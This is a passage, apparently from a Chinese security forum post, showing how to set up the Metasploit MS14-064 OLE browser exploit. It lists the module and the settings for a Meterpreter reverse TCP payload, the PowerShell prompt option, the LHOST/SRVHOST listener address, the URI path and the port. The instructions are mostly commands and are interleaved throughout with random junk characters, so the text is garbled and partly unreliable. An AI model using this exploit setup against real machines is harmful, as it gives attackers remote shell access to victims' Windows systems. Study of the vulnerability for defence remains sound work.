. ~5 ~5 I3 q6 w# v9 S
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
- I4 q+ I! W! M7 p0 w; u
- \: F; j5 v" s( W0 k1 u) T- I L
6 ?0 R' |1 L! b/ G/ i, H8 H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , i7 p8 L: d5 c, j
2 u& v0 R \6 G7 v% ]3 v
8 G, I! g8 S" Z) p5 ] 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp/ y @# w8 e# M- n9 c3 Z
& d4 U7 X/ Z% V4 ]6 z
( s8 Z3 p8 A U. d set AllowPowershellPrompt true0 l. z" r; Z$ Z5 N8 q, v2 D0 s4 F
& d' R% E7 A* S
+ U3 V) b; Z/ [* i3 E! E% ~$ ] Set LHOST 192.168.0.109
7 G+ {4 }7 i1 c$ |3 H* u4 Y) \% G
( R' n- [3 z/ t+ T) p) T6 [! k
4 k5 g: b+ c1 k9 V: K, W0 m
set SRVHOST 192.168.0.109# u+ C7 x" D- r+ L: @* R; ?
/ i3 B6 Z' z. I: V2 ~) ]; ?& q* @7 N2 H) E( C( j* [( @0 g$ h4 J
Set uripath share
) P% [( R3 r) f9 i7 \+ f# u' r9 }
' x5 I; F+ w) P3 e5 t: D1 D" o+ @5 Q, j# e
Set srvport 80# L f b. v# A" d2 F6 s, Y) R9 a
$ ^8 ]0 j! ~( }9 M( ]3 ^% l% v- r; d3 @. H
9 L+ m6 D( w' w% R8 a3 T
5 ^2 {% W- D( O! P& x* x! [; S
/ b6 d1 ]6 t; w+ B, Q! |
5 x( ?) i$ j- X8 |/ f: u
6 p: b& V9 G0 |; Z2 N$ L7 ~
! u' o! _* L8 W% r' e- q H
6 X$ o3 M, }, ?- ]0 e
8 G* p7 U6 n0 `: r" E
* Y/ @- k6 F3 n) Y5 X6 e/ Y: T0 j( b & `. ~2 G `, ^9 n4 l& D& i* k
4 M: h3 l0 G% N8 X; h7 [
$ Q& }: W( z s8 n" |& c/ e
- U3 D& Z5 w; S5 Y1 p
( e$ p6 C, Y4 h5 I& N' |' @; G
+ }! p* r4 @* u2 w2 [% [7 X. Q 下面我们来访问本地地址如图:3 b/ ]! N2 q6 O$ O
; `+ }2 x* f1 V1 w( E& C
! y6 M9 f; T" w4 [6 ~
4 W. ]( J7 w5 d- {8 N
) b) k7 ?; V0 J* l& K: l7 x
7 O, v' D: X! r% M0 r3 ?0 W . I# }; d( j1 s; t/ C
9 U, n( }4 L+ J1 K6 r4 Z: q3 C6 @8 r
" }8 }0 O* g1 e( V0 D2 ] " s% s& C; F9 Z6 p% F, S0 z, J